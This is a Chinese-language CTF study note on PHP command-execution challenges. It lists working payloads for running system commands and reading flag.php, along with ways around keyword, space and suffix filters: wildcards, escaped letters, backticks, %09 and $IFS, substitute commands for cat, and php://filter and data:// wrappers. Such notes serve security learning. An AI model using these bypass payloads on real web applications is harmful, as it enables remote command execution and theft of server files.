CTF 命令执行

知识点：通配符

payload：c=system('cat f*');

在linux系统中 有一些通配符

* 匹配任何字符串／文本，包括空字符串；*代表任意字符（0个或多个） ls file * ? 匹配任何一个字符（不在括号内时）?代表任意1个字符 ls file 0 [abcd] 匹配abcd中任何一个字符 [a-z] 表示范围a到z，表示范围的意思 []匹配中括号中任意一个字符 ls file 0

我们想要执行 cat flag.php，但是flag被过滤了,这时候就可以使用通配符

cat f*表示打开当前目录下所有 f开头的文件

再补充一下： 对于linux cat和ca''t ca\t ca""t效果是相同的 这样同样可以绕过字符的限制 比如 c=system('ca\t fla\g.php');

 

 

知识点：反引号执行系统命令

payload：c=echo `cat f*`;

因为过滤了system，我们就得选择其他的命令执行函数了

常见的有如下几个，其中system是有回显的，其他的就得需要我们自行输出。调用echo或者其他输出函数即可。

system() passthru() exec() shell_exec() popen() proc_open() pcntl_exec() 反引号 同shell_exec()

 

知识点：空格过滤+cat过滤绕过

payload：c=echo(`more%09f*`);

 

在linux 空格可以用以下字符串代替：

 

%09(tab)、$IFS$9、 IFS、IFS、IFS%09(tab)、< 、<>、%20(space)等

在使用带有$的内容替换时，要注意转义，因为\$在php中有特殊含义

eg：echo(`ls\$IFS/`) 在linux中与cat有类似功能的有如下字符 `cat、tac、more、less、head、tail、nl、sed、sort、uniq、rev` 找到一个替换的即可。

 

 

POST传入

?c=include"$_POST[1]“?> 1=php://filter/read=convert.base64-encode/resource=flag.php

 

 

限制了后缀，我们可以试试伪协议，因为不能带有flag，所以filter协议和php://input也不好用了

payload c=data:text/plain,<?php system('cat f*')?>

这样就相当于执行了php语句<?php system('cat f*')?>.php

因为前面的php语句已经闭合了，所以后面的.php会被当成html页面直接显示在页面上，起不到什么作用。